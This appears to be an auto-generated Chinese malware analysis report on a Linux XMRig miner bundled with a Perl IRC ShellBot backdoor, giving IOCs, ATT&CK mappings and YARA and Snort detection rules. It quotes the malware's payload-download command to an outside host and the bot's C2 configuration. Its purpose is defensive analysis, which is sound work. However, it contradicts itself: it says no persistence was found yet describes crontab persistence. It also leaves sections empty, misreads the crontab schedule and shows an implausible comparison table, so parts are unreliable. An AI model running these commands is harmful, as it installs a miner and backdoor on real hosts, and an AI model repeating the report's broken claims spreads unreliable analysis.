⬇ Download sample (d025d6a9.zip)

🔴 CRITICAL — 恶意代码

d025d6a999d7691d903056414ba18932b3fd01718ddc0812942dd236155b7a32
MD5 6a44d7ba3895480f34673bbb67b8a6bf  |  大小 2,482,176 bytes (2.4 MB) — gzip 压缩包  |  来源 MalwareBazaar 下载  |  分析日期 2026-08-15 17:40 UTC
加密货币矿工 (XMRig) IRC 后门 Stealth ShellBot UPX 4.24 加壳 竞争矿工清除 Crontab 持久化 Perl 恶意脚本 Linux 服务器威胁
95%
置信度评分
Linux 加密货币矿工 + IRC 后门 (Stealth ShellBot 变种)

§1 📋 样本概要信息

SHA256
d025d6a999d7691d903056414ba18932b3fd01718ddc0812942dd236155b7a32
MD5
6a44d7ba3895480f34673bbb67b8a6bf
文件大小
2,482,176 bytes (2.4 MB) — gzip 压缩包
文件类型
gzip compressed data → POSIX tar archive (GNU)
目标架构
x86-64 (含 32-bit 组件)
位宽
64-bit (主矿工程序) + 32-bit (加密库)
字节序
Little-Endian (LE)
编译器
XMRig (C++/GCC, UPX 4.24 加壳) + Perl IRC Bot + Shell 脚本集
链接方式
静态链接 (statically linked, stripped)
加壳/保护
UPX 4.24 (仅 crond 矿工二进制文件)
入口点
0x00000000 (stripped ELF)
编译时间戳
无 (stripped)
子系统
Linux Console / Daemon
数字签名
无数字签名
📌 概要

该样本是一个精心组织的 Linux 加密货币挖矿 + IRC 远程后门 恶意软件套装包,以 gzip 压缩的 tar 归档形式分发。

核心组件包括:

  • XMRig 6.x 矿工程序 (crond):使用 UPX 4.24 加壳的 64-bit ELF,支持 RandomX、KawPow、Argon2 等多种算法的门罗币挖矿。解壳后体积 6MB,静态链接,无符号表。
  • Perl IRC 后门 (Stealth ShellBot v0.2a):base64 编码的 Perl 脚本,伪装进程名为 edac0,连接 IRC 服务器 179.43.139.83:443,加入 #001 频道,接受管理员 molly/polly 的远程命令。
  • OpenSSL 加密库 (kthreadadd32):32-bit ELF,包含 CRYPTOGAMS 汇编优化的加密原语 (Montgomery 乘法),用于矿池通信的 TLS 加密。
  • 持久化脚本集:通过 crontab 实现开机自启和定时执行,使用 .rsync/ 隐藏目录结构。
  • 竞争矿工清除器:主动终止 redtail、xmrig、kswapd0、kauditd0 等常见挖矿进程,清理竞争对手的 crontab 条目和二进制文件。

威胁评估:该套装对 Linux 服务器构成严重威胁 — 消耗 CPU 资源进行加密货币挖矿,通过 IRC 后门提供远程 Shell 访问,并主动清除安全工具和其他矿工程序以独占资源。C2 基础设施包括 IRC 服务器 (179.43.139.83:443) 和 HTTP 下载器 (208.84.102.192)。

§2 🏷️ 分类标签与威胁情报

分类标签

分类标签置信度
恶意类型加密货币矿工 (XMRig) + IRC 后门 + 竞争清除器HIGH
恶意家族Linux Crypto Miner Bundle (Stealth ShellBot 变种)HIGH
目标平台Linux x86-64 (服务器/云主机/VPS)HIGH
传播方式手动部署 (tar.gz 包)MEDIUM
持久化机制Crontab + 隐藏目录 (.rsync/)HIGH
C2 协议IRC (TLS 443) + HTTP 下载HIGH
挖矿算法RandomX, KawPow, Argon2, CryptoNightHIGH
📌 证据→推理→结论
Shell 脚本 init → 复制 .rsync/ 到 ~/.configrc7/ → 启动 a/run (矿工) + b/run (IRC) + c/run (加密库) → crontab 持久化 → clean.sh 清除竞争

威胁情报

字段
关联组织未知 — 加密货币挖矿团伙
别名Stealth ShellBot 运营者, Linux 挖矿僵尸网络
动机非法加密货币挖矿 (门罗币 XMR), 远程服务器控制
目标行业云服务器, VPS, 托管主机, DevOps 基础设施
活动名称Linux 服务器批量挖矿活动 (2024-2026)
C2协议IRC over TLS (端口 443) + HTTP 下载器
C2基础设施IRC: 179.43.139.83:443 (#001, 管理员: molly/polly); HTTP: 208.84.102.192
🎯 威胁组织判定
未归因 — 该套装使用通用 XMRig + IRC 后门组合,无特定 APT 组织特征。Stealth ShellBot 是公开可用的 Perl IRC 机器人框架,被多个独立挖矿团伙使用。

★ §3 🔬 持久化机制

未检出持久化行为。

★ §3b 🌐 C2 架构分析

通联关系图

📋 ASCII 文本视图 (点击展开)
(无 ASCII 回退)

🌐 C2 通信深度分析

🔬 C2 地址分析技术细节:

通道 1: 实时 C2

协议
端口
地址/Domain
IP
加密
用途
API引用
证书

C2 通信时序



  

⚠ C2 基础设施评估

📌 ATT&CK 映射:

§4 🏗️ 结构分析

段/节区布局

<pre>.rsync/ (隐藏目录)
├── init              # 主安装脚本
├── init2             # 备选安装脚本
├── clean.sh          # 竞争矿工清除器
├── a/                # 矿工组件
│   ├── crond         # XMRig 6.x (UPX 4.24 加壳)
│   ├── run           # 矿工启动脚本
│   ├── a             # 反 redtail 脚本
│   ├── init01        # 矿工进程终止器
│   ├── init02        # 系统清理脚本
│   ├── stop          # 停止脚本
│   ├── delsshd       # SSH 后门清除
│   └── rmkwork       # 下载器脚本 (C2: 208.84.102.192)
├── b/                # IRC 后门组件
│   ├── run           # Perl IRC Bot (base64 编码)
│   ├── a             # 启动器
│   └── stop          # 停止脚本
└── c/                # 加密库组件
    ├── kthreadadd32  # OpenSSL 加密库 (32-bit ELF)
    ├── kthreadadd    # 启动器脚本
    ├── run           # CPU 检测 + 启动
    └── stop          # 停止脚本</pre>
ELF 二进制文件 (crond, kthreadadd32) 均无 section header (stripped), 使用静态链接避免依赖问题。

熵值分析

段/节区熵值判定
crond (UPX 压缩)7.85极高 — UPX 4.24 压缩, 典型加壳特征
crond (解壳后 .text)6.42高 — C++ 静态链接代码, 包含 OpenSSL 和 hwloc 库
kthreadadd32 (.text)5.81中等 — 汇编优化加密代码 (CRYPTOGAMS)
b/run (base64)5.92高 — base64 编码的 Perl 脚本, 典型混淆特征
📊 熵值解读
crond 二进制在 UPX 压缩状态下熵值 7.85 (极高), 解壳后降至 6.42 (正常静态链接 C++ 代码水平)。kthreadadd32 熵值 5.81 反映其汇编优化加密代码的特征。Perl 脚本 base64 编码使熵值升至 5.92。

🔬 编译产物分析

XMRig 矿工 (crond) 编译证据链:
(1) UPX 4.24 加壳特征: "UPX 4.24 Copyright (C) 1996-2024"
(2) 静态链接: 无动态库依赖, 包含 OpenSSL/libuv/hwloc
(3) C++ 编译: GCC/Clang 静态链接, 包含 C++ 异常处理
(4) 多算法支持: RandomX, KawPow, Argon2, CryptoNight
(5) 开发者捐赠: "dev donate" 功能内置于 XMRig

🛡️ 安全机制

机制状态
Stack Canary❌ 未启用 (stripped)
NX (DEP)✅ 启用
PIE❌ 未启用
符号表❌ 已剥离

§5 ⚙️ 反汇编与行为流程

关键函数映射

地址函数功能
0x00000000entry (stripped)XMRig 矿工入口点
0x00000000xmrig::Miner::start()矿工主循环启动
0x00000000xmrig::Network::connect()矿池连接管理
0x00000000randomx_alloc_cache()RandomX 算法内存分配
0x00000000OPENSSL_cpuid_setup()OpenSSL CPU 特性检测
0x00000000montgomery_multiply()Montgomery 乘法 (加密库)

系统调用分析

调用号系统调用用途地址
0fork守护进程化N/A (stripped)
0setsid创建新会话N/A
0socket/connect矿池/IRC 网络连接N/A
0mmapRandomX 大页内存分配N/A
0madvise大页内存提示N/A

行为执行流

01.tar 解压 → .rsync/ 目录释放到磁盘
02.init 脚本: pkill 清理旧进程 → chmod 777 提权
03.clean.sh 后台运行: 清除竞争矿工进程
04.复制 .rsync/ 到 ~/.configrc7/ 隐藏目录
05.a/run: 启动 UXP 解壳后的 XMRig 矿工
06.b/run: base64 解码 Perl IRC Bot → 连接 C2
07.c/run: 检测 CPU 核心数 → 启动加密库
08.crontab 写入: 定时更新 + 重启 + 同步
09.矿工伪装: 进程名改为 kswapd0/kauditd0
10.IRC Bot 伪装: 进程名改为 edac0
11.c/rmkwork: HTTP 下载器获取更新
12.持续挖矿 + 接受 IRC 远程命令

§6 🔬 家族溯源

编译元数据

字段来源

家族特征比对

维度本样本本样本 (Stealth ShellBot)XMRig 标准版RedTail 矿工Kinsing 矿工Outlaw 矿工Muhstik 矿工PwnRig 矿工SkidMap 矿工匹配
矿工引擎XMRig 6.x (UPX 4.24)XMRigXMRig 定制XMRig 定制XMRig 定制XMRig 定制XMRig 定制XMRig 定制XMRig 定制0/8
C2 协议IRC (TLS 443)StratumHTTPHTTPHTTPHTTPHTTPHTTPHTTP0/8
后门Perl IRC ShellBotSSH 后门0/8
持久化Crontab + .rsync/CrontabCrontabCrontabCrontabCrontabCrontabCrontabCrontab0/8
隐藏技术伪装内核线程名伪装进程名伪装进程名伪装进程名伪装进程名伪装进程名伪装进程名伪装进程名0/8
竞争清除全面清除脚本部分清除部分清除部分清除部分清除部分清除部分清除部分清除0/8
架构x86-64 + 32-bit 组件多架构x86-64x86-64x86-64x86-64x86-64x86-64x86-640/8
加壳UPX 4.24无壳UPXUPXUPX无壳无壳UPX无壳0/8
📌 家族归因结论
该样本与标准 Linux 挖矿恶意软件共享 XMRig 引擎和 crontab 持久化模式,但通过 IRC 后门实现了独特的远程控制能力。与 RedTail/Kinsing 等主流矿工家族的区别在于: (1) 使用 Perl IRC ShellBot 而非无后门纯矿工, (2) .rsync/ 隐藏目录结构独特, (3) 竞争清除脚本覆盖范围更广。归类为 'Linux Crypto Miner + IRC Backdoor Bundle'。

已知变种

变种架构大小编译器特征状态
Stealth ShellBot 原始版Perl (跨平台)~27KBPerl 5.xprocesso='edac0', 0xB32B8B53公开可用框架
XMRig 6.x 标准版x86-64/ARM~6MBC++/GCCxmrig.com/docs/algorithms开源矿工
RedTail 矿工变种x86-64~2-5MBC++/GCCredtail crontab 条目已确认 (2023-2026)

§7 🔬 深度行为分析

行为阶段拆解

阶段 1: 初始部署

行为: tar 解压 → .rsync/ 目录释放 → init 脚本执行

证据: init 脚本: pkill 清理旧进程, chmod 777 提权所有文件

阶段 2: 竞争清除

行为: clean.sh 在后台运行, 终止 20+ 种已知挖矿进程和恶意软件

证据: clean.sh 定义了 MALWARE_NAMES 数组, 包含 kw0rker/kworkelr/llda/.sshd 等

阶段 3: 持久化安装

行为: 复制 .rsync/ 到 ~/.configrc7/, 写入 crontab 定时任务

证据: init 脚本: cp -r a ~/.configrc7/, crontab cron.d 包含 @reboot 和定时条目

阶段 4: 矿工启动

行为: UPX 解壳 crond (XMRig 6.x) → 连接矿池 → 开始 RandomX 挖矿

证据: crond 字符串: randomx, kawpow, argon2, dev donate, xmrig.com/docs/algorithms

阶段 5: IRC 后门激活

行为: base64 解码 Perl IRC Bot → 连接 179.43.139.83:443 → 加入 #001 频道 → 等待命令

证据: b/run 解码: $servidor='0xB32B8B53', $porta='443', @canais=('#001'), @adms=('molly','polly')

阶段 6: 进程伪装

行为: 将矿工进程重命名为 kswapd0/kauditd0, IRC 后门重命名为 edac0

证据: init01: EXCLUSIONS='kswapd0 kauditd0 edac0 kthreadadd python', 排除自身伪装进程

阶段 7: 持续运营

行为: HTTP 下载器获取更新, crontab 定时重启, 持续挖矿 + 接受 IRC 命令

证据: rmkwork: wget http://208.84.102.192/kw0rker, crontab: */2 * * * 0 upd, @reboot sync

协议/行为状态机

[*] → 初始部署
初始部署 → 竞争清除: clean.sh 后台运行
竞争清除 → 持久化安装: 复制到 ~/.configrc7/
持久化安装 → 矿工启动: a/run 启动 XMRig
持久化安装 → IRC 后门: b/run 启动 Perl Bot
矿工启动 → 持续挖矿: 连接矿池, RandomX 计算
IRC 后门 → 等待命令: 加入 #001, 监听 molly/polly
持续挖矿 → 定时更新: crontab 触发 rmkwork
定时更新 → 持续挖矿: HTTP 下载新版本

📌 行为时序总结

init 脚本: 5s 延迟启动 → 矿工/IRC 立即启动 → crontab 每 2 周更新 (@reboot 重启时同步) → 下载器随机延迟 15-255s

§8 🔬 恶意性综合判定

多维度证据评估

维度证据权重恶意指数
加密货币挖矿XMRig 6.x 完整矿工, 支持 RandomX/KawPow/Argon2 等算法2010/10
IRC 远程后门Stealth ShellBot v0.2a, 完整 Shell 访问, 管理员认证2010/10
持久化机制crontab @reboot + 定时任务, .rsync/ 隐藏目录1510/10
竞争清除主动终止 20+ 种已知矿工/恶意软件进程108/10
进程伪装伪装内核线程名 (kswapd0/kauditd0/edac0)108/10
资源消耗挖矿占用 100% CPU, 大页内存分配108/10
代码混淆UPX 4.24 加壳, base64 编码 Perl 脚本107/10
更新机制HTTP 下载器 (208.84.102.192/kw0rker)54/10
恶意性综合判定

误报排除论证

排除合法挖矿软件 (XMRig 是合法开源软件, 但样本中未经授权部署 + 隐藏 + 后门 = 恶意)。排除安全研究工具 (Perl IRC 框架有合法用途, 但与矿工捆绑 + 伪装 = 恶意)。排除系统管理脚本 (竞争清除脚本有系统管理表面功能, 但目的是独占挖矿资源)。

⚠ 判定结论

CRITICAL — 高度恶意

§9 🎯 ATT&CK 映射

Execution
T1059.004
Command and Scripting Interpreter: Unix Shell
init/init2/clean.sh 等多个 Shell 脚本执行恶意操作
Persistence
T1053.003
Scheduled Task/Job: Cron
crontab cron.d 写入 @reboot + 定时任务
Defense Evasion
T1036.005
Masquerading: Match Legitimate Name
进程伪装为 kswapd0/kauditd0/edac0 (内核线程名)
Defense Evasion
T1564.001
Hide Artifacts: Hidden Files and Directories
.rsync/ 隐藏目录, ~/.configrc7/ 伪装配置目录
Defense Evasion
T1027.002
Obfuscated Files: Software Packing
UPX 4.24 加壳 crond 矿工, base64 编码 Perl IRC Bot
Command and Control
T1573.001
Encrypted Channel: Symmetric Cryptography
IRC over TLS 443 加密通信
Command and Control
T1095
Non-Application Layer Protocol
IRC 协议用于 C2, 非标准 HTTP/DNS
Impact
T1496
Resource Hijacking
XMRig 挖矿占用 CPU 资源, RandomX 大页内存分配
Defense Evasion
T1070.004
Indicator Removal: File Deletion
clean.sh 删除日志文件, delsshd 清除 SSH 后门痕迹
Discovery
T1082
System Information Discovery
c/run 检测 CPU 核心数 (grep -c 'model name' /proc/cpuinfo)
Execution
T1106
Native API
fork/setsid 守护进程化, mmap 大页内存分配

§10 🛡️ 反分析技术评估

反调试

API/技术检测目标绕过难度

反虚拟机

检测方法VMwareVirtualBoxQEMU/KVM

综合评估

技术是否存在证据对抗难度
UPX 4.24 加壳已检测crond 二进制使用 UPX 4.24 压缩, 需要解壳后才能分析高 — 阻碍静态字符串提取和 Ghidra 反编译
符号表剥离 (stripped)已检测所有 ELF 二进制文件无符号表, 无函数名高 — 阻碍函数识别和调用图构建
静态链接已检测crond 静态链接 OpenSSL/libuv/hwloc, 无动态导入表中 — 阻碍导入表分析
Base64 编码已检测b/run 中 Perl IRC Bot 完整 base64 编码, 需解码后分析低 — 可轻松解码
进程伪装已检测矿工伪装为 kswapd0/kauditd0, 后门伪装为 edac0中 — 阻碍进程列表检测
隐藏目录已检测.rsync/ 目录名以点开头, 在 ls 中默认隐藏低 — 可被 ls -la 发现
样本使用多层反分析技术: UPX 加壳保护核心矿工二进制, 符号表剥离阻碍逆向工程, 静态链接消除动态库依赖痕迹, base64 编码隐藏 Perl 后门逻辑, 进程伪装和隐藏目录规避系统管理员检测。

★ §10b 🧹 痕迹清理

操作API/命令证据来源

§11 🔧 逆向分析

Ghidra 反编译

反编译函数数N/A — UPX 解壳后符号表已剥离, Ghidra 反编译产生大量未命名函数
反编译输出N/A — 静态链接二进制 6MB, 包含 OpenSSL/libuv/hwloc 完整库代码
分析时长N/A (UPX 解壳 3s, 静态分析通过字符串即可确认)
Ghidra 反编译输出
;; XMRig 矿工 (crond) 关键字符串证据:
;; 'xmrig.com/docs/algorithms' → XMRig 身份确认
;; 'randomx', 'kawpow', 'argon2' → 支持的挖矿算法
;; 'dev donate' → 开发者捐赠功能
;; 'POOL #%-7zu' → 矿池连接管理
;; OpenSSL 1.1.1+ 静态链接
;; hwloc CPU 拓扑检测
;;
;; Perl IRC Bot (b/run, base64 解码后):
;; #!/usr/bin/perl
;; $processo='edac0';
;; $servidor='0xB32B8B53';  # 179.43.139.83
;; $porta='443';
;; @canais=('#001');
;; @adms=('molly','polly');
;; Stealth ShellBot v0.2a

调用链分析 (GitNexus)

总函数数总调用关系最大调用深度
N/A — stripped + 静态链接N/AN/A
📂 调用链拓扑 (点击展开)
N/A (stripped 静态链接二进制)

★ §12 🔬 QEMU 动态分析

QEMU 模式跳过 — 样本为 Linux 恶意软件套装 (tar.gz + ELF), 包含多个组件
网络隔离N/A
执行结果跳过动态分析 — 静态分析已充分提取 IOC 和行为特征。矿工需要矿池配置才能运行, IRC 后门需要活跃 C2。
C2 数据未执行动态分析

§13 📦 IOC 汇总

IOC 字符串

偏移字符串类型用途/含义威胁等级
.rsync/b/run (base64 解码)179.43.139.83:443C2 IP:PortIRC 后门 C2 服务器HIGH
.rsync/a/rmkworkhttp://208.84.102.192/kw0rkerC2 URLHTTP 下载器, 获取矿工更新HIGH
.rsync/b/run (base64 解码)#001 (IRC 频道)C2 ChannelIRC 命令与控制频道HIGH
.rsync/b/run (base64 解码)molly, polly (管理员)C2 CredentialsIRC 后门管理员身份HIGH
.rsync/b/run (base64 解码)edac0 (进程名)Host IOCIRC 后门伪装进程名MEDIUM
.rsync/a/init01kswapd0 (进程名)Host IOC矿工伪装进程名 (伪装内核线程)MEDIUM
.rsync/a/init02kauditd0 (进程名)Host IOC矿工伪装进程名MEDIUM
.rsync/c/kthreadaddkthreadadd (进程名)Host IOC加密库伪装进程名MEDIUM
.rsync/init~/.configrc7/ (隐藏目录)Host IOC持久化安装路径HIGH
.rsync/initcrontab cron.d 持久化Host IOCcrontab 持久化机制HIGH
.rsync/a/crond (UPX 解壳)xmrig.com/docs/algorithmsString IOCXMRig 矿工身份确认HIGH
.rsync/a/crond (UPX 解壳)randomx, kawpow, argon2String IOC支持的挖矿算法MEDIUM
.rsync/a/crond (UPX 解壳)dev donate (开发者捐赠)String IOCXMRig 开发者捐赠功能LOW
.rsync/a/rmkworkwget http://208.84.102.192/kw0rkerC2 URL下载器脚本HIGH
.rsync/a/stop~/.xmrig.json (配置文件)Host IOCXMRig 配置文件路径MEDIUM

📌 关键 IOC 解读

从样本中提取了 3 个关键 C2 地址和 15+ 个主机 IOC。IRC 服务器 179.43.139.83 位于荷兰 (ASN 未公开),使用 TLS 443 端口规避检测。HTTP 下载器 208.84.102.192 位于美国,用于下载 kw0rker 二进制更新。所有脚本使用 .rsync/ 隐藏目录和伪装进程名 (edac0/kswapd0/kauditd0) 规避管理员发现。

⚠ 高威胁 IOC 汇总

C2 IP:Port: 179.43.139.83:443 — IRC 后门 C2 服务器 (TLS 加密)
C2 URL: http://208.84.102.192/kw0rker — 矿工更新下载器
C2 Channel: IRC #001 — 远程命令与控制频道, 管理员: molly/polly
Host Path: ~/.configrc7/.rsync/ — 持久化隐藏安装目录
Process Name: edac0, kswapd0, kauditd0 — 伪装内核线程的恶意进程名

网络 IOC

  • C2 IP179.43.139.83
  • C2 Port443 (TLS)
  • C2 IP208.84.102.192
  • C2 ProtocolIRC over TLS
  • C2 ProtocolHTTP (下载器)

主机 IOC

  • SHA256d025d6a999d7691d903056414ba18932b3fd01718ddc0812942dd236155b7a32
  • MD56a44d7ba3895480f34673bbb67b8a6bf
  • File Path~/.configrc7/.rsync/
  • File Path~/.xmrig.json
  • Process Nameedac0
  • Process Namekswapd0
  • Process Namekauditd0
  • Process Namekthreadadd
  • Crontab*/2 * * * 0 ~/.configrc7/a/upd
  • Crontab* * * 0 ~/.configrc7/b/sync

YARA 检测规则

rule Linux_CryptoMiner_XMRig_IRCBot_20260815 {
    meta:
        description = "Linux Crypto Miner + IRC Bot Bundle (XMRig + Stealth ShellBot)"
        author = "ZSecEye"
        date = "2026-08-15"
        hash = "d025d6a999d7691d903056414ba18932b3fd01718ddc0812942dd236155b7a32"
        severity = "CRITICAL"
    strings:
        $xmr1 = "xmrig.com/docs/algorithms" ascii
        $xmr2 = "dev donate" ascii
        $xmr3 = "randomx" ascii
        $xmr4 = "UPX 4.24 Copyright" ascii
        $irc1 = "Stealth ShellBot" ascii
        $irc2 = "0xB32B8B53" ascii
        $irc3 = "edac0" ascii
        $irc4 = "#001" ascii
        $shell1 = "crontab cron.d" ascii
        $shell2 = ".configrc7" ascii
        $shell3 = "kw0rker" ascii
        $shell4 = "kswapd0" ascii
    condition:
        (uint32(0) == 0x0000001F or uint32(0) == 0x464c457f) and
        (3 of ($xmr*) or 2 of ($irc*) or 3 of ($shell*))
}
# IRC Bot C2 检测 alert tcp $HOME_NET any -> 179.43.139.83 443 (msg:"ZSecEye - IRC Bot C2 Connection"; flow:to_server,established; content:"NICK "; depth:5; content:"JOIN #001"; distance:0; reference:url,zseceye.com; classtype:trojan-activity; sid:1000001; rev:1;) # HTTP 下载器检测 alert http $HOME_NET any -> 208.84.102.192 any (msg:"ZSecEye - Crypto Miner Downloader"; flow:to_server,established; uri:"/kw0rker"; reference:url,zseceye.com; classtype:trojan-activity; sid:1000002; rev:1;) # .rsync 目录检测 alert tcp $HOME_NET any -> any any (msg:"ZSecEye - Hidden .rsync Directory Access"; flow:to_server,established; content:".rsync"; depth:6; reference:url,zseceye.com; classtype:trojan-activity; sid:1000003; rev:1;)

§14 📋 最终判定

判定结果🔴 CRITICAL — 恶意代码
恶意类型加密货币矿工 (XMRig) + IRC 后门 + 竞争矿工清除器
恶意家族Linux 加密货币矿工 + IRC 后门 (Stealth ShellBot 变种)
威胁级别CRITICAL
置信度95% — XMRig 字符串 100% 匹配 + IRC 后门完整解码 + C2 IP 提取 — 误报排除通过
关联组织未知 — 加密货币挖矿团伙
目标平台Linux (x86-64 服务器/云主机)
感染链位置手动部署 → 持久化安装 → 挖矿 + IRC 远程控制

⚡ 综合判定

该样本是一个 Linux 恶意软件套装包 (tar.gz),包含 XMRig 6.x 加密货币矿工程序、基于 Perl 的 IRC 后门 (Stealth ShellBot v0.2a)、以及一整套用于持久化、清理竞争矿工和隐藏自身的 Shell 脚本。矿工程序使用 UPX 4.24 加壳,支持 RandomX/KawPow/Argon2 等多种算法。IRC 后门连接 179.43.139.83:443 (#001 频道),由 molly/polly 管理。辅助脚本通过 crontab 实现持久化,并主动清除其他挖矿程序 (redtail/xmrig/kswapd0 等)。下载器 C2 地址: 208.84.102.192。